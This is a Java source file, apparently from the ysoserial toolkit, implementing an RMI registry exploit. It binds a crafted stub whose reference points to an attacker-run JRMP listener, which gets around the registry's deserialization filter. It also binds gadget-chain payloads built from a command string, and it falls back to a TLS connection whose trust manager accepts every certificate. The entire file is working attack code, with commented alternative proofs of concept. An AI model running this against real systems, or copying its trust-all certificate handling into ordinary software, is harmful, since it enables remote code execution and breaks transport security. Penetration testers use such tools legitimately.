package ysoserial.exploit.rmi;

/**
 * @ClassName: RMIExploit
 * @Description: ToDo
 * @Author: angelwhu
 * @Create: 2019/03/13 13:24
 **/

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import sun.rmi.server.UnicastRef;
import sun.rmi.server.UnicastServerRef;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.Reflections;
import ysoserial.secmgr.ExecCheckingSecurityManager;
import sun.rmi.registry.RegistryImpl;

import javax.management.remote.rmi.RMIConnectionImpl_Stub;
import javax.net.ssl.*;
import java.io.IOException;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Serializable;
import java.lang.reflect.*;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.activation.Activator;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.*;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;

/**
 * Uses UnicastRef injection to get around the ObjectInputFilter checkInput
 * checks applied to a few basic types
 * (sun.rmi.registry).
 */
public class RMIExploit {
    /**
     * Trust manager that performs no certificate validation whatsoever.
     * Every check method has an empty body and therefore returns normally
     * for any chain, and the list of accepted issuers is empty.
     */
    private static class TrustAllSSL extends X509ExtendedTrustManager {
        /** Shared zero-length array handed back by {@link #getAcceptedIssuers()}. */
        private static final X509Certificate[] NO_ISSUERS = new X509Certificate[0];

        // ---- client-side checks: deliberately empty, nothing is ever rejected ----

        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType) {
            // accept unconditionally
        }

        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType, Socket socket) {
            // accept unconditionally
        }

        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType, SSLEngine engine) {
            // accept unconditionally
        }

        // ---- server-side checks: deliberately empty, nothing is ever rejected ----

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType) {
            // accept unconditionally
        }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType, Socket socket) {
            // accept unconditionally
        }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType, SSLEngine engine) {
            // accept unconditionally
        }

        /**
         * @return the shared empty issuer array
         */
        @Override
        public X509Certificate[] getAcceptedIssuers() {
            return NO_ISSUERS;
        }
    }

    /**
     * RMI client socket factory that opens TLS sockets through an
     * {@link SSLContext} initialised with {@link TrustAllSSL} as its only
     * trust manager.
     */
    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
        /**
         * Opens a TLS socket to the given endpoint.
         *
         * @param host remote host name or address
         * @param port remote port
         * @return a socket produced by the context's {@link SSLSocketFactory}
         * @throws IOException wrapping any exception raised while preparing
         *                     the context or creating the socket
         */
        @Override
        public Socket createSocket(String host, int port) throws IOException {
            try {
                // A fresh context is built on every call; no key managers and
                // the default source of randomness are used (both null).
                final SSLContext tls = SSLContext.getInstance("TLS");
                final TrustManager[] trustManagers = {new TrustAllSSL()};
                tls.init(null, trustManagers, null);
                return tls.getSocketFactory().createSocket(host, port);
            } catch (Exception cause) {
                // Every failure, including an IOException from createSocket,
                // is re-wrapped so callers see a single exception type.
                throw new IOException(cause);
            }
        }
    }

    /**
     * Command-line entry point.
     *
     * <p>Expected arguments, in order:
     * <ol>
     *   <li>RMI registry host</li>
     *   <li>RMI registry port</li>
     *   <li>JRMP listener host</li>
     *   <li>JRMP listener port</li>
     * </ol>
     *
     * <p>The usage line is always printed. If fewer than four arguments are
     * supplied an error is written to stderr and the JVM exits with status 1
     * instead of failing with an {@link ArrayIndexOutOfBoundsException}.
     *
     * @param args command-line arguments as described above
     * @throws Exception on a non-numeric port, or anything propagated from
     *                   the registry lookup or from {@code exploit}
     */
    public static void main(final String[] args) throws Exception {
        System.out.println("用法如下 RMIRegistryHost  RMIRegistryPort JRMPListenerHost JRMPListenerPort");

        final int supplied = (args == null) ? 0 : args.length;
        if (supplied < 4) {
            System.err.println("Expected 4 arguments but got " + supplied);
            System.exit(1);
        }

        final String rmiRegistryHost = args[0];
        final int rmiRegistryPort = Integer.parseInt(args[1]);
        final String jrmpListenerHost = args[2];
        final int jrmpListenerPort = Integer.parseInt(args[3]);
        Registry registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort);

        // Probe the registry over a plain connection; if that fails with a
        // ConnectIOException, look it up again through the SSL socket factory.
        try {
            registry.list();
        } catch (ConnectIOException ex) {
            registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort, new RMISSLClientSocketFactory());
        }

        // Bind the UnicastRef-carrying stub that points at the JRMP listener.
        exploit(registry, jrmpListenerHost, jrmpListenerPort);
    }

    /**
     * Builds a payload object from {@code payloadClass} and {@code command}
     * and tries to bind a {@link Remote} proxy carrying it into the registry.
     * The whole sequence runs inside
     * {@link ExecCheckingSecurityManager#callWrapped}.
     *
     * <p>The binding name is {@code "pwned"} followed by
     * {@link System#nanoTime()}. Any {@link Throwable} raised by the bind call
     * is printed and otherwise ignored, after which the payload is released
     * through {@code Utils.releasePayload}.
     *
     * @param registry     registry to bind into
     * @param payloadClass payload generator class; instantiated through its
     *                     no-argument constructor
     * @param command      argument passed to the generator's {@code getObject}
     * @throws Exception whatever {@code callWrapped} propagates
     */
    public static void exploit(final Registry registry,
                               final Class<? extends ObjectPayload> payloadClass,
                               final String command) throws Exception {
        final ExecCheckingSecurityManager guard = new ExecCheckingSecurityManager();
        final Callable<Void> bindTask = new Callable<Void>() {
            @Override
            public Void call() throws Exception {
                final ObjectPayload generator = payloadClass.newInstance();
                final Object gadget = generator.getObject(command);

                final String bindingName = "pwned" + System.nanoTime();
                final Remote carrier = Gadgets.createMemoitizedProxy(
                        Gadgets.createMap(bindingName, gadget), Remote.class);

                try {
                    registry.bind(bindingName, carrier);
                } catch (Throwable failure) {
                    // Report and carry on so the payload is still released below.
                    failure.printStackTrace();
                }

                Utils.releasePayload(generator, gadget);
                return null;
            }
        };
        guard.callWrapped(bindTask);
    }

    /**
     * Builds a {@link UnicastRef} for the given JRMP listener endpoint, wraps
     * it in an {@link RMIConnectionImpl_Stub} and tries to bind that stub into
     * the registry under the name {@code "pwned"} followed by
     * {@link System#nanoTime()}.
     *
     * <p>Any {@link Throwable} raised by the bind call is printed and
     * otherwise ignored.
     *
     * @param registry         registry to bind into
     * @param jrmpListenerHost host placed in the generated reference
     * @param jrmpListenerPort port placed in the generated reference
     * @throws Exception declared for callers; the bind failure itself is caught here
     */
    public static void exploit(final Registry registry, final String jrmpListenerHost, final int jrmpListenerPort) throws Exception {
        final UnicastRef listenerRef = generateUnicastRef(jrmpListenerHost, jrmpListenerPort);

        // poc 1 (the variant actually in use)
        final Remote carrier = new RMIConnectionImpl_Stub(listenerRef);

        /*
        poc 2
        Remote remote = (Remote) Proxy.newProxyInstance(RemoteRef.class.getClassLoader(), new Class<?>[]{Activator.class}, new PocHandler(unicastRef));
         */
        /*
        poc 3
        Remote remote = (Remote) Proxy.newProxyInstance(RemoteRef.class.getClassLoader(), new Class<?>[] { Activator.class }, new RemoteObjectInvocationHandler(unicastRef));
         */
        /*
        poc 4 -- failed, does not work
        UnicastRemoteObject remote = Reflections.createWithoutConstructor(java.rmi.server.UnicastRemoteObject.class);
        Reflections.setFieldValue(unicastRemoteObject, "ref", unicastRef);
        */

        final String bindingName = "pwned" + System.nanoTime();
        try {
            registry.bind(bindingName, carrier);
        } catch (Throwable failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Creates a {@link UnicastRef} object.
     *
     * <p>The reference wraps a {@code LiveRef} built from a newly allocated
     * {@code ObjID}, a {@code TCPEndpoint} for {@code host:port}, and
     * {@code false} as the third constructor argument (presumably the
     * "is local" flag; confirm against the JDK sources).
     *
     * @param host host stored in the endpoint
     * @param port port stored in the endpoint
     * @return a new reference targeting the given endpoint
     */
    public static UnicastRef generateUnicastRef(String host, int port) {
        // Argument evaluation is left to right: ObjID first, then the endpoint.
        return new UnicastRef(
                new sun.rmi.transport.LiveRef(
                        new java.rmi.server.ObjID(),
                        new sun.rmi.transport.tcp.TCPEndpoint(host, port),
                        false));
    }

    /**
     * Serializable {@link InvocationHandler} that holds a single
     * {@link RemoteRef}. It is referenced only from the commented-out "poc2"
     * variant in {@code exploit}, where it backs a dynamic proxy.
     *
     * <p>NOTE(review): no {@code serialVersionUID} is declared, so the default
     * computed value applies; changing the members of this class would change
     * that value.
     */
    public static class PocHandler implements InvocationHandler, Serializable {
        // The wrapped remote reference; part of the default serialized form.
        private RemoteRef ref;

        /**
         * @param newref reference to store in this handler
         */
        protected PocHandler(RemoteRef newref) {
            ref = newref;
        }


        /**
         * Reflectively invokes {@code method} on the stored reference,
         * ignoring the {@code proxy} argument.
         *
         * @param proxy  the proxy instance the call arrived on (unused)
         * @param method the method to invoke on the stored reference
         * @param args   arguments forwarded to {@code method}
         * @return whatever the reflective call returns
         * @throws Throwable anything raised by {@link Method#invoke}
         */
        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            // NOTE(review): Method.invoke requires the target to be an instance
            // of the method's declaring class; confirm the intended methods are
            // RemoteRef methods if this path is ever exercised locally.
            return method.invoke(this.ref, args);
        }
    }

}
